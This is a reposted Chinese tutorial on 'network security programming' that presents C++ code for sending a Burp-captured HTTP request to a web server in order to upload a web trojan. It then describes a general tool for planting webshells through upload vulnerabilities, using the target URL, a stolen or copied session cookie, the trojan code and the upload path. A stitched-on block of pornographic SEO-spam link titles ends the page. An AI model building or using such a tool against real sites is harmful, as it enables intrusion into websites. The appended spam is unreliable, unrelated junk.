《電子技術(shù)應(yīng)用》
您所在的位置:首頁 > 通信與網(wǎng)絡(luò) > 業(yè)界動(dòng)態(tài) > 網(wǎng)絡(luò)安全編程:上傳網(wǎng)頁木馬

網(wǎng)絡(luò)安全編程:上傳網(wǎng)頁木馬

2021-07-13
來源:計(jì)算機(jī)與網(wǎng)絡(luò)安全
關(guān)鍵詞: 木馬

  上傳木馬的模塊可以通過直接發(fā)包達(dá)到上傳的效果,實(shí)現(xiàn)起來比較簡單,代碼如下:

  void CuploadmumaDlg::OnBnClickedButton1()

  {

  // TODO: 在此添加控件通知處理程序代碼

  WSAData wsa = { 0 };

  // 初始化

  WSAStartup(MAKEWORD(2, 2), &wsa);

  // 獲取 IP 地址

  DWORD dwIPAddr = 0;

  m_IpAddr.GetAddress(dwIPAddr);

  // 獲取端口號(hào)

  WORD dwPort = 0;

  dwPort = GetDlgItemInt(IDC_PORT);

  // 創(chuàng)建 SOCKET

  SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

  sockaddr_in sockaddr = { 0 };

  sockaddr.sin_family = AF_INET;

  sockaddr.sin_addr.S_un.S_addr = htonl(dwIPAddr);

  sockaddr.sin_port = htons(dwPort);

  // 連接服務(wù)器

  int nRet = connect(s, (SOCKADDR*)&sockaddr, sizeof(SOCKADDR));

  // 獲取從 BURP 截取的 HTTP 的 request 包

  char szText[2048] = { 0 };

  GetDlgItemText(IDC_TEXT, szText, 2048);

  // 發(fā)送包

  nRet = send(s, szText, lstrlen(szText), 0);

  closesocket(s);

  WSACleanup();

  }

  代碼的流程比較簡單,主要就是完成了與Web服務(wù)器的連接,然后發(fā)送通過Burp截取的數(shù)據(jù)內(nèi)容,程序界面如圖1所示。

微信圖片_20210713142806.jpg

  圖1  發(fā)送木馬數(shù)據(jù)包上傳木馬

  該木馬發(fā)送程序比較簡陋,只是簡單地提交了對Web服務(wù)器請求的數(shù)據(jù)包。開發(fā)一個(gè)較為通用的木馬上傳工具,就不能這么偷懶了。首先,需要提取出存在上傳漏洞的地址,因?yàn)槊總€(gè)系統(tǒng)存在上傳漏洞的地址是不相同的,因此漏洞的地址必須能夠接收用戶的輸入。接著提取HTTP請求頭部中的“Cookie”部分,因?yàn)樯蟼髂抉R時(shí)可能需要登錄系統(tǒng)以后才能進(jìn)行上傳,但是為什么發(fā)包的時(shí)候可以,因?yàn)閿?shù)據(jù)包中有COOKIE,因此必須要能讓用戶輸入“cookie”,因?yàn)橐话愕纳蟼髀┒纯赡苁钦搲?、博客等系統(tǒng),因此用戶可以自行登錄后,將cookie復(fù)制出來并粘貼到程序中。然后還有木馬的內(nèi)容需要用戶自定義,那么程序界面上也需要留下輸入木馬的文本框,可以直接輸入木馬的代碼,也可以直接讓用戶輸入木馬的目錄,然后讓程序從文件中把木馬代碼讀出。有的上傳漏洞能夠讓用戶去控制上傳木馬后所在的目錄,那么還要給用戶一個(gè)可以設(shè)置上傳位置的輸入框。




電子技術(shù)圖片.png

本站內(nèi)容除特別聲明的原創(chuàng)文章之外,轉(zhuǎn)載內(nèi)容只為傳遞更多信息,并不代表本網(wǎng)站贊同其觀點(diǎn)。轉(zhuǎn)載的所有的文章、圖片、音/視頻文件等資料的版權(quán)歸版權(quán)所有權(quán)人所有。本站采用的非本站原創(chuàng)文章及圖片等內(nèi)容無法一一聯(lián)系確認(rèn)版權(quán)者。如涉及作品內(nèi)容、版權(quán)和其它問題,請及時(shí)通過電子郵件或電話通知我們,以便迅速采取適當(dāng)措施,避免給雙方造成不必要的經(jīng)濟(jì)損失。聯(lián)系電話:010-82306118;郵箱:aet@chinaaet.com。
主站蜘蛛池模板: 久热这里只有精品视频6| 免费特级黄毛片在线成人观看| avtt天堂在线| 性欧美69式xxxxx| 久久久久久亚洲av无码专区| 欧男同同性videos免费| 亚洲欧美日韩中文无线码| 男人插女人30分钟| 动漫精品一区二区三区四区 | 成人免费观看一区二区| 久久伊人中文字幕麻豆| 最新亚洲人成无码网www电影| 亚洲欧美天堂综合久久| 澳门a毛片免费观看| 免费午夜爽爽爽WWW视频十八禁| 美女张开腿让男人桶的动态图| 国产亚洲视频在线观看网址| 成年人在线看片| 国产精品久久久久久一区二区三区| 91麻豆最新在线人成免费观看| 夫妇交换性3中文字幕k8| 一级呦女专区毛片| 性欧美高清come| 两个人看的WWW在线观看| 成年美女黄网站色| 久久不射电影院| 日本aⅴ日本高清视频影片www| 久久人妻内射无码一区三区| 日韩大片在线永久免费观看网站| 九九精品视频在线播放8| 最近免费最新高清中文字幕韩国| 亚洲人成影院在线无码按摩店| 欧美伊人久久久久久久久影院| 亚洲国产精品一区二区三区在线观看 | 韩国无码AV片在线观看网站| 国产成人精品视频一区二区不卡 | 无码少妇精品一区二区免费动态| 久久婷婷色一区二区三区| 日韩在线高清视频| 久久精品亚洲精品国产欧美| 日韩免费高清一级毛片在线|